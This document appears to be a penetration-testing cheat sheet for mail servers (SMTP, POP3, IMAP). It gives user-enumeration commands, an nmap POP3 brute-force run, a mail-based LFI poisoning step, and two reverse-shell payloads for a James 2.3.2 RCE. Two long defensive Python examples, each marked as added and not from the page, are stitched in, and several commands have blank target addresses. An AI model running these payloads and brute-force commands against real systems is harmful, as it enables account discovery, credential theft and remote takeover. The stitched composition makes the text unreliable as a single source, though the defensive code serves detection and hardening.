Mail Servers

SMTP [Port 25]

  • SMTP stands for Simple Mail Transfer Protocol.

  • It is a TCP/IP protocol that’s used for sending emails.

In order to send emails with SMTP we first have to know how a mail transaction works:

  1. SMTP sessions are initiated after the client opens a TCP/IP connection to the server and the server responds with a greeting (220)

  2. The client sends a HELO or EHLO with the client's identity (example: HELO which means "Hi I'm")

  3. Now the client has to perform 3 steps each separated by a CRLF for a valid SMTP mail transaction:

    • Step 1: MAIL: This tells the server "Hey, we're starting a new email, reset your state". This is where the email "from" is specified.

    • Step 2: RCPT: Tells the server where (to whom) we want to send the email.

    • Step 3: DATA: This is where the Subject and body of the email are set, and the client indicates the end of the mail data by a new line containing only ".". This tells the server that the client confirms the email and tells the server to process it and send it.

telnet 25

User Enumeration

  • -M: EXPN, VRFY or RCPT

  • -U: File of usernames

vrfy raj@domainname

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t

Email Enumeration

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t
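The following Python script is an added example and not code from this page or from smtp-user-enum. It is a toy server-side SMTP session handler that walks through the transaction described above (220 greeting, HELO/EHLO, then MAIL, RCPT and DATA terminated by a line holding only "."), and it answers VRFY and EXPN with the same reply regardless of the name asked for, which is the server-side mitigation against the VRFY/EXPN user and email enumeration shown in the two sections above. The hostnames, addresses, local domain and reply strings are constructed assumptions.

```python
"""Toy server-side SMTP session handler (added example, not from the page).

Models the transaction described above: 220 greeting, HELO/EHLO, then
MAIL -> RCPT -> DATA with the body terminated by a line holding only ".".
VRFY/EXPN are answered without confirming that a mailbox exists, which
is the mitigation for VRFY/EXPN user enumeration.  Hostnames, addresses
and the local domain are constructed for the example.
"""
import re

CRLF = "\r\n"
ADDR_RE = re.compile(r"<([^<>]+@[^<>]+)>")


class SmtpSession:
    def __init__(self, hostname="mx.example.test", local_domain="example.test"):
        self.hostname = hostname
        self.local_domain = local_domain
        self.greeted = False
        self.in_data = False
        self.messages = []  # accepted messages as (sender, recipients, body)
        self.reset()

    def reset(self):
        """Clear the per-transaction state (what MAIL does on the server)."""
        self.sender = None
        self.recipients = []
        self.data_lines = []

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready"

    def handle_line(self, line):
        """Process one client line (without CRLF); return the reply or None."""
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            self.reset()
            return f"250 {self.hostname} Hello {arg.strip() or 'unknown'}"
        if not self.greeted:
            return "503 5.5.1 Send HELO/EHLO first"
        if verb == "MAIL":
            self.reset()  # step 1: new email, state is reset
            m = ADDR_RE.search(arg)
            if not m:
                return "501 5.1.7 Syntax: MAIL FROM:<address>"
            self.sender = m.group(1)
            return "250 2.1.0 Sender OK"
        if verb == "RCPT":  # step 2: who the mail goes to
            if self.sender is None:
                return "503 5.5.1 Need MAIL before RCPT"
            m = ADDR_RE.search(arg)
            if not m:
                return "501 5.1.3 Syntax: RCPT TO:<address>"
            rcpt = m.group(1)
            if not rcpt.lower().endswith("@" + self.local_domain):
                return "554 5.7.1 Relay access denied"  # refuse to be an open relay
            self.recipients.append(rcpt)
            return "250 2.1.5 Recipient OK"
        if verb == "DATA":  # step 3: headers and body follow
            if not self.recipients:
                return "503 5.5.1 Need RCPT before DATA"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "VRFY":
            # Same reply for every name, so the client learns nothing about mailboxes.
            return "252 2.5.2 Cannot VRFY user, try RCPT to attempt delivery"
        if verb == "EXPN":
            return "502 5.5.1 Command not implemented"
        if verb == "QUIT":
            return f"221 {self.hostname} closing connection"
        return "500 5.5.2 Command not recognized"

    def _data_line(self, line):
        if line == ".":  # end of mail data: accept and reset for the next transaction
            self.in_data = False
            self.messages.append((self.sender, list(self.recipients),
                                  CRLF.join(self.data_lines)))
            self.reset()
            return "250 2.0.0 Message accepted for delivery"
        # Dot-stuffing: a body line that starts with "." arrives as ".." and is unstuffed.
        self.data_lines.append(line[1:] if line.startswith(".") else line)
        return None  # no reply until the terminating "."


def run_conversation(session, client_lines):
    """Feed scripted client lines to the session and return every server reply."""
    replies = [session.greeting()]
    for line in client_lines:
        reply = session.handle_line(line)
        if reply is not None:
            replies.append(reply)
    return replies


if __name__ == "__main__":
    for reply in run_conversation(SmtpSession(), [
        "EHLO client.example.test", "VRFY raj", "MAIL FROM:<alice@example.test>",
        "RCPT TO:<bob@example.test>", "RCPT TO:<someone@other.test>", "DATA",
        "Subject: hello", "", "body", ".", "QUIT",
    ]):
        print("S:", reply)
```

Running it prints the server side of the conversation: the 554 on the second RCPT shows the relay check, and the 252 on VRFY is identical whether or not "raj" exists, so a tool looping over a username file gets no signal from this server.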

IMAP [Port 143]


POP3 [Port 110]

#Banner grabbing
nc -nv 110 
telnet 110

user <username>
pass <password>

nmap -sV --script=pop3-brute <target>
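As an added defender-side example (not from the page and not part of nmap or its pop3-brute script), the Python below spots the password guessing such a run leaves in the mail server's auth log. The log lines are constructed for the example and only loosely imitate Dovecot-style pop3-login failure messages; that format is an assumption, so adapt LINE_RE to the real server. The threshold and window are arbitrary values chosen for the example.

```python
"""Flag POP3 password guessing in auth logs (added example, not from the page).

The log lines below are constructed and only loosely imitate Dovecot-style
'pop3-login: Disconnected (auth failed ...)' messages; the format is an
assumption, so adapt LINE_RE to the real server.  Rule: alert on a source
IP once it reaches THRESHOLD failed logins inside a sliding window, and
report the distinct usernames tried, which separates a mistyped password
(one user, few tries) from a brute-force or spray (many users, many tries).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

THRESHOLD = 5            # failures inside the window before alerting
WINDOW_SECONDS = 60      # sliding window length

LINE_RE = re.compile(
    r"^(?P<ts>\S+) pop3-login: Disconnected \(auth failed[^)]*\): "
    r"user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[0-9.]+)"
)

# Constructed sample: 203.0.113.7 guesses many users quickly; 198.51.100.9 is
# one user mistyping a password twice and then logging in successfully.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<raj>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:03Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<admin>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:05Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<test>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:07Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:09Z pop3-login: Disconnected (auth failed, 1 attempts in 4 secs): user=<raj>, method=PLAIN, rip=198.51.100.9, lip=10.0.0.5
2024-05-01T10:00:11Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<info>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:13Z pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<support>, method=PLAIN, rip=203.0.113.7, lip=10.0.0.5
2024-05-01T10:00:15Z pop3-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<raj>, method=PLAIN, rip=198.51.100.9, lip=10.0.0.5
2024-05-01T10:00:20Z pop3-login: Login: user=<raj>, method=PLAIN, rip=198.51.100.9, lip=10.0.0.5
"""


def parse_failure(line):
    """Return (timestamp, user, source_ip) for a POP3 auth failure line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group("user"), m.group("rip")


def detect_bruteforce(log_text, threshold=THRESHOLD, window_seconds=WINDOW_SECONDS):
    """Return one alert dict per source IP that crosses the failure threshold."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> deque of (ts, user) still inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_failure(line)
        if parsed is None:
            continue              # successful logins and unrelated lines are ignored
        ts, user, ip = parsed
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({
                "ip": ip,
                "failures": len(q),
                "users": sorted({u for _, u in q}),
                "first": q[0][0].isoformat(),
                "last": ts.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f"{alert['ip']}: {alert['failures']} failures between "
              f"{alert['first']} and {alert['last']}, users tried: {alert['users']}")
```

On the sample the scanner address is reported after its fifth failure with five different usernames, while the legitimate user's two failed attempts never cross the threshold. The user list is the useful field when triaging: many distinct accounts from one address is a scan, not a forgotten password.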

#List messages
list

#Read message number
retr 1

#To send email using SMTP for LFI /var/mail/ValidUserHere
Subject: email title
<your LFI code here>
<new blank line>

Free Mail Server

  • hMailServer [Windows]

James 2.3.2 RCE

#Change payload in the script
payload = '/bin/bash -i >& /dev/tcp/ 0>&1' 
payload = 'nc -e /bin/bash 4242 &'
